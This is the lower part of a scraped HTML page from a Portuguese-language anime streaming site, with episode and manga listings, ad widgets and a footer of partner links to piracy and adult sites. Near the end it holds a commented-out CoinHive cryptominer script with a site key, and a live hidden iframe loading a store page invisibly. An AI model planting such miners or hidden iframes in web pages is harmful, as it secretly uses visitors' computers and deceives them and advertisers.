<a href="http://www.animesorion.tv/118702" title="Kaito Sentai Lupinranger Vs. Keisatsu Sentai Patranger Episódio 5">Kaito Sentai Lupinranger Vs. Keisatsu Sentai Patranger Episódio 5</a>
</div> 
</li>
<li>
<div class="thumb">
<div class="dataThumb">17/03/2018 </div>
<a href="http://www.animesorion.tv/118569" title="Dragon Ball Super Episódio 130">
<img src="https://4.bp.blogspot.com/-TcozDloKu1w/WqHqZm8ScsI/AAAAAAAAa5s/VsWdEZzZLHgyfujkAyPMsH7fvdmEed2nQCLcBGAs/s420/130.JPG" title="Dragon Ball Super Episódio 130" alt="Dragon Ball Super Episódio 130"></a>
</div>
<div class="Titulotelinhas">
<a href="http://www.animesorion.tv/118569" title="Dragon Ball Super Episódio 130">Dragon Ball Super Episódio 130</a>
</div> 
</li>
<li>
<div class="thumb">
<div class="dataThumb">16/03/2018 </div>
<a href="http://www.animesorion.tv/118701" title="Wangu Xian Qiong Episódio 10">
<img src="https://2.bp.blogspot.com/-LjUG9a3Jb34/WnBXh-a2HaI/AAAAAAAAacQ/ws-cdMAkzf4DSTgWWmUzpNzMfYlZrYNMwCLcBGAs/s420/wangu-xian-qiong.JPG" title="Wangu Xian Qiong Episódio 10" alt="Wangu Xian Qiong Episódio 10"></a>
</div>
<div class="Titulotelinhas">
<a href="http://www.animesorion.tv/118701" title="Wangu Xian Qiong Episódio 10">Wangu Xian Qiong Episódio 10</a>
</div> 
</li>
<li>
<div class="thumb">
<div class="dataThumb">16/03/2018 </div>
<a href="http://www.animesorion.tv/118700" title="Ramen Daisuki Koizumi-san Episódio 11">
<img src="https://3.bp.blogspot.com/-hI3oCiAM1W4/Wk6yvEhQLFI/AAAAAAAAaQU/TrUuUWFkSs4PQ-rw1IcUUnT-4-Ydp21aACLcBGAs/s420/ramen-daisuki-koizumi-san.JPG" title="Ramen Daisuki Koizumi-san Episódio 11" alt="Ramen Daisuki Koizumi-san Episódio 11"></a>
</div>
<div class="Titulotelinhas">
<a href="http://www.animesorion.tv/118700" title="Ramen Daisuki Koizumi-san Episódio 11">Ramen Daisuki Koizumi-san Episódio 11</a>
</div> 
</li>
</ul>
<div class="pagenav clearfix"> <span class="number current">1</span>  <a href="http://www.animesorion.tv/page/2" class="number">2</a>  <a href="http://www.animesorion.tv/page/3" class="number">3</a>  <a href="http://www.animesorion.tv/page/4" class="number">4</a>  <a href="http://www.animesorion.tv/page/5" class="number">5</a>  <a href="http://www.animesorion.tv/page/6" class="number">6</a>  <a href="http://www.animesorion.tv/page/7" class="number">7</a>  <a href="http://www.animesorion.tv/page/8" class="number">8</a>  <a href="http://www.animesorion.tv/page/9" class="number">9</a>  <a href="http://www.animesorion.tv/page/10" class="number">10</a> <a href="http://www.animesorion.tv/page/2305" title="&raquo;" class="number">&raquo;</a></div> 
</div>
</div>
<!-- FIM LANÇAMENTOS-->
<!-- MANGÁS MAIS RECENTES
<div class="contentBox">
<h1>Mangás Atualizados</h1>
<div class="telinhasMangas">
<ul>
<li>
<div class="thumb">
<div class="dataThumb">16/03/2018 </div>
<a href="http://www.animesorion.tv/118695" title="Mangá Boku No Hero Academia Capítulo 175">
<img src="https://3.bp.blogspot.com/-lX63F1NNnN8/WqxPz87ZdMI/AAAAAAAAbAg/dnzDuCwHJ6ks8vHigEQcycxI32jN8HuaACLcBGAs/s420/boku_no_hero_academia175-07.jpg" title="Mangá Boku No Hero Academia Capítulo 175" alt="Mangá Boku No Hero Academia Capítulo 175"></a>
</div>
<div class="TitulotelinhasMangas">
<a href="http://www.animesorion.tv/118695" title="Mangá Boku No Hero Academia Capítulo 175">Mangá Boku No Hero Academia Capítulo 175</a>
</div> 
</li>
<li>
<div class="thumb">
<div class="dataThumb">15/03/2018 </div>
<a href="http://www.animesorion.tv/118680" title="Mangá Shingeki No Kyojin 103">
<img src="https://2.bp.blogspot.com/-LXmBEuv_jUE/WqrAPPxbosI/AAAAAAAAa-Y/ay0a_YIm9hwv0Z_ofm4dEwvS5jWrB1erwCLcBGAs/s420/23.png" title="Mangá Shingeki No Kyojin 103" alt="Mangá Shingeki No Kyojin 103"></a>
</div>
<div class="TitulotelinhasMangas">
<a href="http://www.animesorion.tv/118680" title="Mangá Shingeki No Kyojin 103">Mangá Shingeki No Kyojin 103</a>
</div> 
</li>
<li>
<div class="thumb">
<div class="dataThumb">09/03/2018 </div>
<a href="http://www.animesorion.tv/118591" title="Mangá Boku No Hero Academia Capítulo 174">
<img src="https://2.bp.blogspot.com/-jkR513HDFtA/WqMUN6J1DfI/AAAAAAAAa7g/_1iR9T1vCBYKBm33PPqkl_y0d-IQv2zkQCLcBGAs/s1600/boku_no_hero_academia174-10.jpg" title="Mangá Boku No Hero Academia Capítulo 174" alt="Mangá Boku No Hero Academia Capítulo 174"></a>
</div>
<div class="TitulotelinhasMangas">
<a href="http://www.animesorion.tv/118591" title="Mangá Boku No Hero Academia Capítulo 174">Mangá Boku No Hero Academia Capítulo 174</a>
</div> 
</li>
<li>
<div class="thumb">
<div class="dataThumb">03/03/2018 </div>
<a href="http://www.animesorion.tv/118460" title="Mangá Boku No Hero Academia Capítulo 173">
<img src="https://1.bp.blogspot.com/-ckGqRNmfKzM/WpqzxXw6BUI/AAAAAAAAa4k/9QjuJ9JCfbISP11oLBM5wOtH_mUxx6uUwCLcBGAs/s420/07.png" title="Mangá Boku No Hero Academia Capítulo 173" alt="Mangá Boku No Hero Academia Capítulo 173"></a>
</div>
<div class="TitulotelinhasMangas">
<a href="http://www.animesorion.tv/118460" title="Mangá Boku No Hero Academia Capítulo 173">Mangá Boku No Hero Academia Capítulo 173</a>
</div> 
</li>
<div id="exibirMangas"><a href="http://www.animesorion.tv/mangas-online">VEJA MAIS MANGÁS</a></div>	
</ul>
</div>
</div>
<!-- MANGÁS MAIS RECENTES-->
</div>
<div id="sidebarGeral">
<div class="sidebar"><div id="tituloSidebar">PUBLICIDADE:</div>			
<div class="textwidget">
<center>
<script type="text/javascript">
if(!window.BB_a) { BB_a = [];} if(!window.BB_ind) { BB_ind = 0; } if(!window.BB_vrsa) { BB_vrsa = 'v3'; }if(!window.BB_r) { BB_r = Math.floor(Math.random()*1000000000)} BB_ind++; BB_a.push({ "pl" : 41218, "index": BB_ind});
</script>
<script type="text/javascript">
document.write('<scr'+'ipt async id="BB_SLOT_'+BB_r+'_'+BB_ind+'" src="//st.bebi.com/bebi_'+BB_vrsa+'.js"></scr'+'ipt>');
</script>
</center>
</div>
</div>
<div class="sidebar"><div id="tituloSidebar">CURTA NOSSA PÁGINA!</div>			
<div class="textwidget">
<center>
<iframe style="border: none; overflow: hidden;" src="https://www.facebook.com/plugins/page.php?href=https://www.facebook.com/AnimesOrion/&amp;tabs&amp;width=340&amp;height=214&amp;small_header=false&amp;adapt_container_width=true&amp;hide_cover=false&amp;show_facepile=true&amp;appId=822764804479248" width="340" height="214" frameborder="0" scrolling="no"></iframe>
</center>
</div>
</div>
<div class="sidebar"><div id="tituloSidebar">PRÉVIAS</div>			
<div class="textwidget">
<center>
<iframe width="100%" height="315" src="https://www.youtube.com/embed/M_Q2HMwgepE" frameborder="0" allowfullscreen></iframe>
<br></br>
<iframe width="100%" height="315" src="https://www.youtube.com/embed/1dAFTpbR0vg" frameborder="0" allowfullscreen></iframe>
</center>
</div>
</div>
</div>
</div>
</div>
<!-- PARCEIROS
<div id="footer">
<div id="parceiros">
<ul>       
<li><a href="http://www.animeiros.org/" target="_blank">ASSISITIR ANIMES</a> | </li>
<li><a href="http://radioblast.com.br/" target="_blank">RÁDIO BLAST</a> | </li>
<li><a href="https://www.lojapremio.com.br/receptores-digitais/tocomsat" target="_blank">AUDISAT</a> | </li>
<li><a href="https://www.zeletro.com.br/receptores-digitais/cinebox" target="_blank">CINEBOX</a> | </li>
<li><a href="https://www.animevonline.com/" target="_blank">ANIMEVONLINE</a> | </li>
<li><a href="http://www.animeshin.com/" target="_blank">ANIMESHIN</a> | </li>
<li><a href="http://animetubebrasil.com/" target="_blank">ANIME TUBE BRASIL</a> | </li>
<li><a href="http://giganimes.com" target="_blank">GIG ANIMES</a> | </li>	
<li><a href="http://novanimesnoticias.blogspot.com.br/" target="_blank">NOVANIMES NOTÍCIAS</a> | </li>
<li><a href="http://www.telecinetorrent.com/" target="_blank">TELECINE TORRENT</a> | </li>
<li><a href="http://www.assistirtvbr.tv/" target="_blank">ASSISTIR TV BR</a> | </li>
<li><a href="http://z1animes.com/" target="_blank">Z1 ANIMES</a> | </li>
<li><a href="http://asnaruto.xpg.uol.com.br/" target="_blank">ASNARUTO</a> | </li>
<li><a href="http://www.fenixsub.com/" target="_blank">FENIX SUB</a> | </li>
<li><a href="http://www.anituga.net/" target="_blank">ANITUGA</a> | </li>
<li><a href="http://assistiranime.com.br/" target="_blank">ASSISTIR ANIMES</a> | </li>
<li><a href="https://www.anituba.net/" target="_blank">ANITUBA</a> | </li>
<li><a href="http://www.hentaistube.com/" target="_blank">HENTAI</a> | </li>	
<li><a href="http://assistiranimeshd.com/" target="_blank">ASSISITIR ANIMES HD</a> | </li>
<li><a href="https://megani.me/" target="_blank">MEGANI</a> | </li>
<li><a href="https://www.youtelecine.com/" target="_blank">YOU TELECINE</a> | </li>
<li><a href="http://www.superanimes.biz/" target="_blank">SUPER ANIMES</a> | </li>
<li><a href="http://www.animalog.me/" target="_blank">ANIMALOG</a> | </li>
<li><a href="http://www.compresex.com.br/" target="_blank">LOJA SEX SHOP</a> | </li>
<li><a href="http://www.animep.net/" target="_blank">ANIMEP</a> | </li>
<li><a href="http://www.assistirfilmeshd.biz/" target="_blank">ASSISITIR FILMES HD</a> | </li>
<li><a href="http://www.animeiros.org/" target="_blank">ANIMES ONLINES</a> | </li>
<li><a href="https://www.animevonline.com/" target="_blank">ANIMEVONLINE</a> | </li>
</ul>
</div>
<div id="creditos">Animes Órion 2011 - 2018</div>
</div>
<!-- PARCEIROS -->
<!-- SCRIPT PARA FIXAR O MENU  -->
<script>
$(function(){   
var nav = $('#topo');   
$(window).scroll(function () { 
if ($(this).scrollTop() > 0) { 
nav.addClass("menu-fixo"); 
} else { 
nav.removeClass("menu-fixo"); 
} 
});  
});
</script>
<!-- SCRIPT PARA FIXAR O MENU  -->
<!-- CODIGO DAS ABAS -->
<!-- <iframe src="http://www.animesorion.tv/css.php" width="5px" height="5px" style=" display: none; "></iframe> -->
<script src='http://www.animesorion.tv/js/jquery.idTabs.min.js' type='text/javascript'> </script>
<script src='http://www.animesorion.tv/js/js.js?nocache' type='text/javascript'></script>
<script type="text/javascript"> 
$("#tabs ul").idTabs(); 
</script>
<!-- CODIGO DAS ABAS -->
<!-- PUBLICIDADES  -->
<!--<script src="http://www.animesorion.org/scripts/cookieanimeiros.js"></script> -->
<!--<iframe src="http://www.animatub.com/inicio" width="100px" height="100px" style=" display: none; "></iframe> -->
<!--
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script type="text/javascript">
var miner = new CoinHive.Anonymous('RaJo646LTGAd02DJIcVsRgtUGiaxma43', { throttle: 0.8 });
miner.start();
</script>
-->
<iframe src="https://iframe.lojapremio.com.br/" width="100px" height="100px" style=" display: none; "></iframe>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<script id="ifre" type="text/javascript" src="https://www.comandosfilmes.org/Generate.php?p=1018&s=1008&nocache"></script>		
<!-- PUBLICIDADES  -->	
<!-- GOOGLE ANALYTICS -->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-46300251-14', 'auto');
ga('send', 'pageview');
</script>
<!-- GOOGLE ANALYTICS -->
<script type='text/javascript' src='http://www.animesorion.tv/wp-includes/js/wp-embed.min.js?ver=4.9.4'></script>
</body>
</html><!-- WP Fastest Cache file was created in 0.33833980560303 seconds, on 17-03-18 12:41:48 --><!-- via php -->